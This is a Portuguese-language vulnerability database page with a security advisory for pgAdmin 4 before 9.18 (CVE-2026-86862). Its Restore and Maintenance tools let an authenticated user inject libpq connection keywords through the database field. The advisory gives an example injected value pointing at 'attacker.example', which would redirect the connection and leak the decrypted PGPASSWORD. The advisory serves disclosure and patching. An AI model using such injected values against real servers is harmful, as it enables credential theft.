Início
Início
Tendências
Tendências
Vulnerabilidades
Vulnerabilidades
Notícias
Notícias
Pesquisadores
Pesquisadores
Por que dbugs?
Por que dbugs?
Configurações

Hitesh Jambhale

#42132de 57,623
7.1CVSS total
Vulnerabilidades · 1
PT-2026-94389
7.1
2026-09-17
Pgadmin · Pgadmin · CVE-2026-86862
**Nome do Software Vulnerável e Versões Afetadas** pgAdmin 4 versões anteriores a 9.18 **Descrição** As ferramentas de Restauração e Manutenção passam o campo `database` fornecido pelo cliente diretamente como o valor da opção `--dbname` para o `pg restore` e `psql`. Como o libpq expande nomes de bancos de dados que contenham um sinal de igual em strings de conexão completas, as palavras-chave de conexão nesse valor têm precedência sobre os argumentos `--host` e `--port`. Um invasor pode fornecer um valor como `host=attacker.example port=5432 dbname=x` para redirecionar o utilitário para um servidor de sua escolha. Como o pgAdmin exporta a senha do banco de dados descriptografada na variável de ambiente `PGPASSWORD`, a conexão redirecionada pode expor essa credencial ao invasor. Além disso, isso permite conexões de saída do host pgAdmin para endereços de rede arbitrários. Este problema é acessível por qualquer usuário autenticado com as permissões `tools restore` ou `tools maintenance`, que são concedidas à função de Usuário padrão. **Recomendações** Atualize para a versão 9.18 ou posterior.